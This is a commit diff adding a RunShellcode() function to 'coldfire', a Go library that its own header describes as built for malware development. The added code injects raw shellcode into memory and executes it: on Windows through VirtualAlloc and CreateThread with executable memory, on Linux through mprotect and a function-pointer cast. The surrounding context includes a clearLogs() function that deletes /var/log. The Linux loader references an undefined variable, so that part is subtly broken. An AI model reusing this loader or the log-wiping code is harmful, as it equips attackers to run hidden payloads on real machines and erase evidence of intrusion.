+ RunShellcode() for executing raw bytearray (optionally in background/as a suspended process)

Author: wintrmvte

coldfire.go

@@ -386,3 +386,8 @@ func AutoDoc(port ...int) {
 	}
 	CmdRun(F("godoc -http=:%d", docport))
 }
+
+// Injects a bytearray into current process and executes it
+func RunShellcode(sc []byte, bg bool){
+	runShellcode(sc, bg)
+}

coldfire_linux.go

@@ -2,8 +2,11 @@
 // for malware development that are mostly compatible with
 // Linux and Windows operating systems.
 package coldfire
-import "os"
-
+import (
+	"os"
+	"syscall"
+	"unsafe"
+)
 func clearLogs() error {
 	err := os.RemoveAll("/var/log")
 	return err
@@ -18,3 +21,16 @@ func wipe() error {
 
 	return nil
 }
+
+func runShellcode(sc []byte, bg bool){
+	sc_addr := uintptr(unsafe.Pointer(&shellcode[0]))
+	page := (*(*[0xFFFFFF]byte)(unsafe.Pointer(sc_addr & ^uintptr(syscall.Getpagesize()-1))))[:syscall.Getpagesize()]
+	syscall.Mprotect(page, syscall.PROT_READ|syscall.PROT_EXEC)
+	spointer := unsafe.Pointer(&shellcode)
+	sc_ptr := *(*func())(unsafe.Pointer(&spointer))
+	if (bg) {
+		go sc_ptr()
+	} else {
+		sc_ptr()
+	}
+}

coldfire_windows.go

@@ -5,6 +5,8 @@ package coldfire
 
 import (
 	"os"
+	"syscall"
+	"unsafe"
 )
 
 func shutdown() error {
@@ -34,6 +36,22 @@ func wipe() error {
 	return nil
 }
 
+func runShellcode(sc []byte, bg bool){
+	var bg_run uintptr = 0x00
+	if (bg) {
+		bg_run = 0x00000004
+	}
+	kernel32 := syscall.MustLoadDLL("kernel32.dll")
+	VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
+	procCreateThread := kernel32.MustFindProc("CreateThread")
+	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x2000|0x1000, syscall.PAGE_EXECUTE_READWRITE)
+	ptr := (*[990000]byte)(unsafe.Pointer(addr))
+	for i, value := range sc {
+		ptr[i] = value
+	}
+	procCreateThread.Call(0, 0, addr, 0, bg_run, 0)
+}
+
 // func dialog(message, title string) {
 // 	zenity.Info(message, zenity.Title(title))
 // }